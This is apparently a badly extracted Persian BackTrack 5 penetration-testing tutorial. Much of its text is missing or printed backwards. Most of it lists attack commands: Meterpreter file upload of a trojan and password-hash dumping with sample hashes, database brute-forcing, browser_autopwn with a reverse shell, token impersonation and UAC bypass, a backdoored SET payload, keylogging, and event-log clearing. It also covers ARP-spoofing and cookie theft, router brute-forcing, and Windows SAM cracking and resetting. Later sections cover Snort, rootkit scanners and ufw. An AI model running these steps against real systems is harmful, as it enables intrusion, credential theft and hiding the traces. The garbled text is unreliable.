msf > show auxiliaryAuxiliary=========Name Description---- ---- ----admin/backupexec/dump Veritas Backup Exec Windows Remote File Accessadmin/backupexec/registry Veritas Backup Exec Server Registry Accessadmin/cisco/ios_http_auth_bypass Cisco IOS HTTP Unauthorized AdministrativeAccess...snip...

msf > show exploits show encoders

msf > show payloads show nops

show options

show advanced

show targets

15.ps: .

meterpreter > ps

104

16.migrate: notpad ) (.

Ps notpad .:

pid=1540migrate to 1540

17.ls: .

meterpreter > ls18.download:

:meterpreter > download c:\\boot.ini[*] downloading: c:\boot.ini -> c:\boot.ini[*] : c:\boot.ini ->c:\boot.ini/boot.ini

19.upload:evil-trojan .

meterpreter > upload evil_trojan.exe c:\\windows\\system3220.ipconfig:

.21.execute:command.

execute -f cmd.exe -i -H22.hashdump: )user account( .

meterpreter > run post/windows/gather/hashdump[*]Obtaining the user list and keys...[*]Decrypting user keys...[*]Dumping password hashes...

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b :1891f4775f676d4d10c09c1

104


Ps notpad .:


17.ls: .









104


Ps notpad .:


17.ls: .









105

225a5c0a3:::dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbda e13ed5abd30ac94ddeb3cf52d:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0:::

Metasploitable MySQL: metasploit meta MYSQL

. :

(. ( metasploit. (word-list attack .1( :

msfconsole2( :

search MySQL

106

3( brute-force sql:use auxiliary/scanner/mysql/mysql_login

4( :show options

5( :set RHOSTS 192.168.10.111

6( word-list-user :set user_file /root/Desktop/usernames.txt

7( word-list-password :set pass_file /root/Desktop/passwords.txt

107

8( :exploit

: + user password .

Metasploitable Postgresql: )metasploit MySQL ( . .

:set RHOSTS 192.168.10.111set user_file /opt/metasploit/msf3/data/wordlists/postgres_default_user.txtset pass_file /opt/metasploit/msf3/data/wordlists/postgres_default_user.txtexploit

901

:eludom nwpotua_resworb eht gnitnemelpmI

..

: elosnocfsmnwpotua hcraes

nwpotua_resworb/revres/yrailixua esu:

pct_esrever/reterpretem/swodniw daolyap tessnoitpo wohs

011

. sserdda pi= TSOHL901.01.861.291 TSOHL tes

. sserdda pi . "sepytelif" HTAPIRU tes

tiolpxe: TSOHL sserdda pi

.0808:]sserddA PI dedivorP[//:ptth sserdda PI eht ta tiolpxe eht strats tiolpsateM .sserdda pi

. noisses :

. : 1 i- noissesplehtrats_nacsyekpmud_nacsyek

.... tacmoT elbatiolpsateM. - : 1 . FPD elbatiolpsateM : 2

111

3 : Wifi Hacking :KarmetasploitIn Action

:http://www.offensive-security.com/me...loit_In_Actionhttp://www.backtrack-linux.org/forum...hp?t=21492#topwww.hackingdna.comhttp://wirelessdefence.org/Contents/karmetasploit.htmhttps://www.google.com/#q=tutorial+metasploithttp://www.offensive-security.com/metasploit-unleashed/Attack_Analysishttp://searchsecurity.techtarget.in/tip/BackTrack-5-tutorial-Part-I-Information-gathering-and-VA-toolshttp://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commandshttp://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basicshttp://en.wikibooks.org/wiki/Metasploit/MeterpreterClienthttp://sectools.org/tag/sploits/Metasploitable Tomcat:http://www.rapid7.com/db/modules/exp...cat_mgr_deployhttp://www.rapid7.com/db/modules/aux...mcat_mgr_loginhttp://www.securitygeeks.net/2013/05...he-tomcat.htmlhttp://www.offensive-security.com/me...n_HTTP_Moduleswww.youtube.com/watch?v=o8_qLxPW--swww.youtube.com/watch?v=0-ue2_q_9oUMetasploitable PDF:http://www.offensive-security.com/me..._Side_Exploitshttp://www.offensive-security.com/me...rting_Exploitshttp://www.exploit-db.com/exploits/14681/http://blog.g0tmi1k.com/2011/03/vide...dobe-pdfs.htmlhttps://community.rapid7.com/thread/2742http://www.rapid7.com/db/modules/exp...f_embedded_exe

112

Karmetasploit In Action :http://www.offensive-security.com/me...loit_In_Actionhttp://www.backtrack-linux.org/forum...hp?t=21492#tophttp://wirelessdefence.org/Contents/karmetasploit.htmWeb explotion tools:http://www.blackhatlibrary.net/Category:Web_exploitationhttp://www.dotslashbacktrack.com/web-exploitation-tools.htmlhttp://www.aldeid.com/wiki/Websecurifyhttp://www.aldeid.com/wiki/W3AFhttp://searchsecurity.techtarget.in/tip/A-Web-exploit-toolkit-reference-guide-for-BackTrack-5http://www.aldeid.com/wiki/Category:Backtrack/GUI/Exploitation-Tools/Web-Exploitation-Tools

311

noitalacsE egelivirP

. :snekot noitanosrepmi gnisU

.

5 . reterpretem noisses

: (11 i- snoisses

:reterpretem (2otingocni esu

: (3pleh

114

4( :list_tokens -u

5( :impersonate_token \\test-pc\willie

:impersonate_token [name of the account to impersonate]

Local privilege escalation attack: :

1. :

2. :getsystem -hgetsystem

: win7 UAC(user access control) :run post/windows/escalate/bypassuac

115

Mastering the Social-Engineer Toolkit (SET): framework .1( set:

cd /pentest/exploits/set :

Applications | BackTrack | Exploitation Tools | Social Engineering Tools | Social EngineeringToolkit | set.

2( :./set

3( :y enter.

4( set :Social-Engineering Attacks.Fast-Track Penetration Testing.Third Party Modules.Update the Metasploit Framework

116

.Update the Social-Engineer Toolkit

.Update SET configuration

.Help, Credits, and About

.Exit the Social-Engineer Toolkit

:1( "social engineering attack" 1 .2( Create a Payload and Listener:

4

711

(: noitcennoc esrever) pi (3901.01.861.291

: daolyap (4reterpreteM PCT_esreveR swodniW:

2 ssapyb gnidocnE (5

. )TSEB( elbatucexE deroodkcaB: 61 . (6

reldnah (7.reldnah tiolpxe elgoog .

. :

811

:atad 'smitciv gnitcelloC: .

:

: trats_nacsyek

:pmud_nacsyek

.: :

119

Cleaning up the tracks: .

:sessions -i 1

:irib

:log = client.sys.eventlog.open('system')log = client.sys.eventlog.open('security')log = client.sys.eventlog.open('application')log = client.sys.eventlog.open('directory service')log = client.sys.eventlog.open('dns server')log = client.sys.eventlog.open('file replication service')

021

: raelc.gol

:)MTIM( kcatta elddim-eht-ni-naM.

: (1G pacrette

121

2(:Sniff | Unified sniffing

3( :

4(:Hosts | Scan for hosts

5(:Hosts| Hosts list

221

. 1 tegrat ot dda 1 tegrat dda 211.01.861.291:

:(6gniffins tratS | tratS

: pra (gninosiop prA | mtiM

321

:(8snoitcennoc etomer ffinS

: (9

421

: (01gniffins potS | tratS

.

:noitalupinam ciffart LRU foopspra pra

. . selbat-pi

: drawrof_pi/4vpi/ten/sys/corp/ >> 1 ohce odusdrawrof_pi/4vpi/ten/sys/corp/ > tac

. 511.01.861.291 pi 7niw :

. i-( kcabpool=oL __ tenrehtE=hte __ sseleriw=nalw

. t-( 1.01.861.291 511.01.861.291 t- 0nalw i foopspra odus

: .]sserdda PI noitanitsed[ ]sserdda PI tegrat[ t ]ecafretni[ i foopspra

.011.01.861.291: pi. pi yawateg 011.01.861.291 1.01.861.291 t- 0nalw i foopspra odus

521

:noitcerider troP .

. 0808 08 . gnippam tropgnidrawrof trop noitcerider trop

: drawrof_pi/4vpi/ten/sys/corp/ >> 1 ohce oduS

. 1.01.861.291 pi ( )yawetag_ 1.01.861.291 0nalw i foopspra odus

: .]sserdda PI noitanitsed[ ]ecafretni[ i foopspra

. 011.01.861.291: pi

: 0808 trop-ot-- TCERIDER j- 08 trop-noitanitsed-- pct p- GNITUORERP A- tan t- selbatpi

( ffins) .

:seikooc gnilaets yb liam-e na gnisseccA

. -ysaE , pirtsLRU , pirtsLSS , pacrettE: . tpyrcne

. sdeerc-ysae . . . . . sdeerC: (1

621

: (2hs.sderc-ysae/.

. 2

: 2

721

. :gninosioP PRA yawenO 3 (3

: (40nalw: : (5

sdeerc-ysae/sreffins/tsetnep sderC-ysaE/toor/: :

n"esu ot smitciv fo elif detalupop a evah uoy oD": (6:

1.01.861.291: yawetag pi (

n: "kcatta gnikcajedis a edulcni ot ekil uoy dluoW" (

: (9

128

10( ettercap . easey-creeds .

:http://en.wikipedia.org/wiki/Man-in-...e_of_an_attackhttp://openmaniak.com/ettercap_filter.phpcain & caabl:http://www.irongeek.com/i.php?page=v...-arp-poisoningcain & cabl:http://www.hacking-tutorial.com/hack...middle-attack/

:http://www.chmag.in/article/jun2012/mitm-ettercaphttp://www.tech-juice.org/2011/06/20...with-ettercap/

http://www.offensive-security.com/metasploit-unleashed/Event_Log_Management

129

https://pypi.python.org/pypi/sslstrip/0.9.2http://www.backtrack-linux.org/forums/showthread.php?t=20272http://seclist.us/2013/01/update-easy-creeds-v-3-7-3-linux-bash-script-for-mitm-attacks.html

:www.youtube.com/watch?v=RfHfmeaYcy0www.youtube.com/watch?v=rw_b__wiSWMwww.youtube.com/watch?v=EMTzBfbU808

131

2( :/pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/nameslist.txt/pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/john.txt

: .

3( )tab (target ip :192.168.10.111

231

: (4. ksat fo rebmun :

: trats trats (5

331

:ssecca retuor gniniaG. ecrof-eturb : .1

asudem | skcattA enilnO | skcattA drowssaP | noitalacsE egelivirP | kcarTkcaB | snoitacilppA

: .2n- sn e- tsl.ed0ckrad/stsildrow/sdrowssap/tsetnep/ P- nimda u- 1.01.861.291 h- ptth M- asudem

F- 08

. ptth :M-. pi:h-.nimda :u-. :p-. :e-. :F-

134

-n: . Medusa :

AFP ,CVS ,FTP ,HTTP ,IMAP ,MS SQL ,MySQL ,NetWare ,NNTP ,POP3 ,Postgresql ,REXEC,RLOGIN ,RSH ,SMBNT ,SMTP AUTH ,SMTP VRFY ,SNMP ,SSHv2 ,Subversion ,Telnet ,VMware authentication ,VNC ,www

Password profiling:

.1( meta:

msfconsole2( email :

search email collector

3( :use auxiliary/gather/search_email_collector

4( :show options

531

: (5. : :

moc.evitcepsrepseilliwmorf niamod tes

. . (6txt.eilliwmorf/potkseD/toor/ eliftuo tes

: (7nur

. (8:reppiR eht nhoJ gnisu drowssap swodniW a gnikcarC

. MAS hsah nhoj BSU (. kcatta ssecca lacisyhP)

ecrof-eturb nhoj . MOR_DVD/DC .

: (1l- ksidF

631

: (2/tegrat/ 1ads/ved/ tnuom

: MAS (3gifnoc/23metsys/swodniw/tegrat/ dc

: (4la- sl

: (5txt.hsah/sehsah/toor/ > MAS metsys 2pmudmas

: reppir nhoj (6rtj/sdrowssap/tsetnep/ dc

: (7txt.hsah/sehsah/toor/ nhoj./

: SFTN (8tn:f-txt.hsah/sehsah/toor/ nhoj/.

:skcatta yranoitcid gnisU.

: (1etadpu teg-tpa

: (2hcnurc llatsni teg-tpa

: (3hcnurc/sdrowssap/tsetnep/

731

: (4]snoitpo[ ]tes retcarahc[ ]htgnel mumixam[ ]htgnel muminim[ hcnurcsnoitpo

. :o-BK , BM , BG: : b-^ , % , @: . :l-( : 01 8 ) (5

o- 9876543210gfedcbaGFEDCBA 01 8 hcnurc/hcnurc/sdrowssap/tsetnep/txt.hcnurCdetareneg/potkseD/toor/

: (6txt.hcnurCdetareneg/potkseD/toor/ onan

. :

:skcatta ssecca lacisyhP kcarCUS

. : noitpo . : pleh--

. : l-. 3 : s-

138

-a : ANSI .-w : multithread .1. crunch .

sucrack /pentest/passwords/wordlists/rockyou.txt2. 6 ANSI .

sucrack -w 2 -s 6 -a /pentest/passwords/wordlists/rockyou.txt

:http://www.remote-exploit.org/articles/misc_research__amp_code/index.htmlhttp://www.securityfocus.com/tools/category/11http://www.breaknenter.org/http://www.breaknenter.org/projects/inception/Using rainbow tables:www.youtube.com/watch?v=yVlX8lh967Mwww.youtube.com/watch?v=X1krdBR_RRohttp://null-byte.wonderhowto.com/how-to/rainbow-tables-create-use-them-crack-passwords-0131470/http://renderlab.net/projects/WPA-tables/http://xiaopan.co/forums/threads/wpa-wpa2-psk-rainbow-tables-33gb.440/Using ATI Stream:www.youtube.com/watch?v=TeqN8BM9A30http://www.backtrack-linux.org/forums/showthread.php?t=41531http://www.offensive-security.com/backtrack/cuda-and-ati-stream-backtrack/https://sites.google.com/site/nozyczek/home/wardriving/how-to-install-pyrit-with-ati-cal-support-under-backtrack-5-r1-gnome-64bithttp://www.backtrack-linux.org/wiki/index.php/Install_OpenCL

139

Using NVIDIA Compute Unified Device Architecture (CUDA):www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdfwww.backtrack-linux.org/documents/BACKTRACK_CUDA_v2.0.pdfhttp://www.backtrack-linux.org/wiki/index.php/CUDA_On_BackTrackhttps://www.google.com/#q=+NVIDIA+Compute+Unified+Device+Architecture+on+backtrack+5Password profiling:http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_http://www.pcmag.com/article2/0,2817,2389089,00.asphttps://bechtsoudis.com/hacking/password-profiling-mask-attacks/http://my.safaribooksonline.com/book/-/9781849517386/9dot-password-cracking/ch09s05_html

041

scisneroF kcarTkcaB(:trons)

noisurtni) . (SDI( )metsys noitceted

. . tronS

. : trons eluR (1

selur/trats/gro.trons//:ptth.pungis/gro.trons.www//:sptth

: (2

141

: noitpO . trons :q-. "edom reffins" PI/PCT :v-fnoc.trons/trons/cte/: :c-. :i-: (3

fnoc.trons/trons/cte/ c- 1hte i- v- q- trons

.x+lrtc (4. trons :

: .1fnoc.trons etacol

: .2fnoc.trons/trons/cte/ onan

241

."yna TEN_EMOH rav": . .3.

: pI 01.01.861.291 TEN_EMOH rav: pi ( 42/0.01.861.291 TEN_EMOH rav: pi ( 42/0.2.0.01,42/0.01.861.291 TEN_EMOH rav: pi (

: 42/0.01.861.291 TEN_EMOH rav

. .4.

:

143

: Comment :# :

#var EXTERNAL_NET anyvar External_NET !$HOME_NET

pdf :www.snort.org/assets/166/snort_manual.pdf

Recursive directory encryption/decryption:encryption .decryption . gpgdir dec enc .

1(:mkdir /sourcecodecd /sourcecode

2( :wget http://cipherdyne.org/gpgdir/download/gpgdir- 1.9.5.tar.bz2

3( :wget http://cipherdyne.org/gpgdir/download/gpgdir- 1.9.5.tar.bz2.asc

144

4( :gpg --import public_keygpg --verify gpgdir-1.9.5.tar.bz2.asc

5( :tar xfj gpgdir-1.9.5.tar.bz2cd gpgdir-1.9.5./install.pl

6( :gpgdir

./ gpgdir

541

: (7crridgpg./toor/ iv

. yek_tluafed :

. :

: .1yrotcerid_detpyrcne/ ridkm

. tpyrcne .2: .3

yrotcerid_detpyrcne/ e- ridgpg

. .4: .5

641

: tpyrcne : yrotcerid_detpyrcne/ d- ridgpg

: ./scod/ridgpg/gro.enydrehpic//:ptth

:stiktoor fo sngis rof gninnacS . -

. . tiktoorkcehc

: :tiktoorkhc | slooT scisneroF suriV-itnA | scisneroF | kcarTkcaB | snoitacilppA

: tiktoorkhc/scisnerof/tsetnep/ dctiktoorkhc/.

.

741

. retnuhkrstiktoor : .1

kcehc-- retnuhkr: .2

841

: tiktoorkhc . :h-. :V-. : l-

: retnuhkr : (1

etadpu-- retnuhkr: (2

tsil-- retnuhkr(:piks ) (3

ks-- kcehc-- retnuhkr:ecruos citamelborp a morf atad gnirevoceR

kcabtaf . BSU : . : (1

l- ksidf. 1bds/ved/ :

: (2kcabtaf/ ridkmselifevirdbmuht/kcabtaf/ ridkm

941

: (3kcabtaf/ dc

: (4kcabtaf | slooT gnivraC cisneroF | scisneroF | kcarTkcaB | snoitacilppA

: (5

: . kcabtaf:a-selifevirdbmuht/kcabtaf/: .... :o-

051

1bds/ved/: : (6

a- selifevirdbmuht/kcabtaf/ o- 1bds/ved/ kcabtaf:

slselifevirdbmuht dcsl

. :

: gnivraC_eliF/ikiw/gro.ikiwscisnerof.www//:ptth

:drowssap swodniW a gniveirteR. kcarchpO

: (1.php.selbat/ten.egrofecruos.kcarchpo//:ptth

: elbat (2

251

: daoL MAS (6

: kcarC (7

:drowssap swodniW a gnitteseR: .

. . gifnoC\23metsyS\swodniW\:C: (1

l- ksidf/tegrat/ 1ads/ved/ tnuom

:MAS (2gifnoc/23metsys/swodniw/tegrat/ dc

: (3la- sl

: (4wptnhc/sdrowssap/tsetnep/ dc

: (5MAS/gifnoc/23metsys/swodniw/tegrat/ i- wptnhc/.

351

,aera ?oD ot tahW: (6. 1

. 1 (7(. knalb drowssap) 1 (8

:seirtne yrtsiger swodniW eht ta gnikooL. .wptnhc

: (1l- ksidf/tegrat/ 1ads/ved/ tnuom

: MAS (2gifnoc/23metsys/swodniw/tegrat/ dc

: (3la- sl

: (4wptnhc/sdrowssap/tsetnep/ dc

: ( )edom evitcaretni (5gifnoc/23metsys/swodniw/tegrat/ i- wptnhc/.

aera ?oD ot tahW: (6. 9

: . (7sl

: DC (8dc.

154

:http://indonetworksecurity.com/Network%20and%20website%20security/linux/page/4chntpw:http://www.wikihow.com/Change-a-Windows-User-Password-Using-Backtrack-4http://www.quali5.asia/2013/03/convert-guest-account-into.htmlhttp://securityxploded.com/backtrackregistry.phpwww.youtube.com/watch?v=G15vPnmQ3Gkwww.youtube.com/watch?v=ukgJ-kgTjrchttp://www3.nd.edu/~dpettifo/tutorials/chntpw.htmlophcrack :www.youtube.com/watch?v=X1krdBR_RRohttp://www.rmprepusb.com/tutorials/ophcrackwww.youtube.com/watch?v=di3BIqq40bEfatback:http://indonetworksecurity.com/linux/tutorial-fatback-backtrack.htmwww.youtube.com/watch?v=0TYLq2wTr00http://www.securitytube.net/video/4245

chkrootkit:www.youtube.com/watch?v=Zqs0CXfqVfUhttp://hackingdna.com/Description.aspx?ItemHeaderId=3179E185-4F7A-4568-8DD4-B563C5F050F2http://fuzzexp.org/the-backtrack-forensics-the-howto.htmlhttp://sourceforge.net/apps/trac/rkhunter/wiki/SPRKHhttp://hackingbuzz.com/hunt-rootkits-with-rootkit-hunter-tool/snort:http://www.thegeekstuff.com/2010/08/snort-tutorial/http://security.koenig-solutions.com/1/post/2013/02/configuring-snort-in-backtrack-5-r3.html

155

http://openmaniak.com/snort_tutorial_snort.phphttp://www.linuxuser.co.uk/tutorials/protect-your-network-with-snortgpgdir :http://archive09.linux.com/feature/132999http://kerry-linux.ie/wee/cloud/wee-owncloud.php

: Port Knickong:http://cipherdyne.org/blog/categories/port-knocking-and-spa.html

651

enO xidneppA .

. selif ] zg.rat ,2pizb.rat ,piz ,rat[ tcartxe ro etaerC:

:rat emanelif rat.emanelif fvc- rat $

: zg.ratrat rat.emanelif fvx- rat $zg.rat.emanelif fzvx- rat

:piz piz.emanelif piz

: piz redlof_noitanitsed d- piz.elif piznu

: zg zg.elif piznug $

zg.elif d- pizg $

: 2zb.rat -fvx rat|2zb.rat.elif dc- 2pizb

(. ). citpanys revihcrax : : WFU

. 40.01 utnubu

157

UFW :sudo ufw enable

UFW:sudo ufw disable

:sudo ufw status verbose

:root@bt:~# ufw status verboseStatus: activeLogging: on (low)Default: deny (incoming), allow (outgoing)New profiles: skip

:sudo ufw status

:sudo ufw statusFirewall loaded

To Action From22:tcp DENY 192.168.0.122:udp DENY 192.168.0.122:tcp DENY 192.168.0.722:udp DENY 192.168.0.722:tcp ALLOW 192.168.0.0/2422:udp ALLOW 192.168.0.0/24

UFW : .

:sudo ufw allow /

158

1:sudo ufw allow 53sudo ufw allow 53/tcpsudo ufw allow 53/udp

:sudo ufw deny /

2:sudo ufw deny 53/udpsudo ufw deny 53

:sudo ufw allow from

3 : ip :sudo ufw allow from 207.46.232.182

subnet:sudo ufw allow from 192.168.1.0/24

:sudo ufw allow from to port

4 : Ip 192.168.0.4 22 :sudo ufw allow from 192.168.0.4 to any port 22

:sudo ufw allow from to port proto

5 : 22 tcp ip 192.1680.4:sudo ufw allow from 192.168.0.4 to any port 22 proto tcp

Enable/Disable ping: :

/etc/ufw/before.rules :

159

# ok icmp codes-A ufw-before-input -p icmp --icmp-type destination-unreachable -j ACCEPT-A ufw-before-input -p icmp --icmp-type source-quench -j ACCEPT-A ufw-before-input -p icmp --icmp-type time-exceeded -j ACCEPT-A ufw-before-input -p icmp --icmp-type parameter-problem -j ACCEPT-A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT

: ping ACCEPT DROP.# ok icmp codes-A ufw-before-input -p icmp --icmp-type destination-unreachable -j DROP-A ufw-before-input -p icmp --icmp-type source-quench -j DROP-A ufw-before-input -p icmp --icmp-type time-exceeded -j DROP-A ufw-before-input -p icmp --icmp-type parameter-problem -j DROP-A ufw-before-input -p icmp --icmp-type echo-request -j DROP

: :

sudo ufw status numbered :

sudo ufw delete 1

160

1 : 22 ip 192.168.0.3192.168.0.1192.168.0.7:sudo ufw status

) :(Firewall loaded

To Action From22:tcp DENY 192.168.0.122:udp DENY 192.168.0.122:tcp DENY 192.168.0.722:udp DENY 192.168.0.722:tcp ALLOW 192.168.0.0/24

) :(sudo ufw delete allow from 192.168.0.0/24 to any port 22sudo ufw statusFirewall loaded

To Action From22:tcp DENY 192.168.0.122:udp DENY 192.168.0.122:tcp DENY 192.168.0.722:udp DENY 192.168.0.7

sudo ufw deny 192.168.0.3 to any port 22sudo ufw allow 192.168.0.0/24 to any port 22 proto tcpsudo ufw statusFirewall loaded

161

To Action From22:tcp DENY 192.168.0.122:udp DENY 192.168.0.122:tcp DENY 192.168.0.722:udp DENY 192.168.0.722:tcp DENY 192.168.0.322:udp DENY 192.168.0.322:tcp ALLOW 192.168.0.0/24

:ufw deny 80/tcpsudo ufw delete deny 80/tcp

: :

less /etc/services :

sudo ufw allow sudo ufw allow sshsudo ufw deny ssh

Command in BT5-R3:1(touch:

.touch alimp5.html

2(Cat: .

3(echo: .

echo salaaam > alimp5.html

261

:pc (4.

lmth.5pmila/pmt/ lmth.5pmila pc:vm(5

. emaner tuclmth.5pmila/toor/ lmth.5pmila vMlmth.rafaj lmth.5pmila vm

: mr (6.

lmth.rafaj mr:xua sp (7

. :lliK (8

. 0851- llik

:etacoL (9.

:dniF (01.

lmth.xedni toor/ dniF:resudda (11

hedazmiza resudda:a emanu (21.

: al sl (31

361

. :dwssap (41

. :

dwssap/cte/: tac

dwssap/cte/ taC:

:bed. elif-noiatacol i- gkpd

:bed.ila/potkseD/toor/ i- gkpd

:mpr. elif-noiatacol i- mpr

: mpr.ila/potkseD/toor/ i- mpr

:exe. exe.elif-noitacol eniw

: exe.llacdiar/toor/ eniw

: ( ) . hs. :

. ( noissimrep)

461

hs.5pmila hs :

hs.5pmila 777 domhc:

hs.5pmila/.:

xobv erawmv :

: ehcapa (1

561

: (2www/rav/

: pi (3gifnocfi: pi :

661

piz.mv-tb/1.0.0.721: ehcapa : : (4

piz.mv-tb/3.1.861.291//:ptth.

. odomoC : . .

:tneilC&revreS_PCHD :

: citpanys

3pchd: . revres-3pchd tneilc-3pchd nommoc-3pchd

167

: pkgs.orgwww. ubuntu 10.04 :

dhcp3-client_3.1.3-2ubuntu3_i386.debdhcp3-common_3.1.3-2ubuntu3_i386.debdhcp3-server_3.1.3-2ubuntu3_i386.deb

(3 synaptic) ( . ( .deb :

dhcp3-commondhcp3-serverdhcp3-client

.

:http://www.proprofs.com/webschool/search.php?tag=true&search=backtrack,+hackers,+hacking,+linux,+nmap,+snort,+powerhttp://www.wikihow.com/Unzip-Files-in-Linuxhttps://help.ubuntu.com/community/UFWwww.youtube.com/watch?v=cscIe9fYKMUhttp://www.ubuntugeek.com/ufw-uncomplicated-firewall-for-ubuntu-hardy.htmlhttps://help.ubuntu.com/community/Gufwhttp://ubuntuforums.org/showthread.php?t=823741

861

owT xidneppA:

.

learning back track 5 :persian

Documents

tbevil retne tb

kcartkcab llatsni

tb yromemhsalf

drac oediv aidivn

drac oediv ita

etadpu tegtpa odus

drowssap toor

toor esare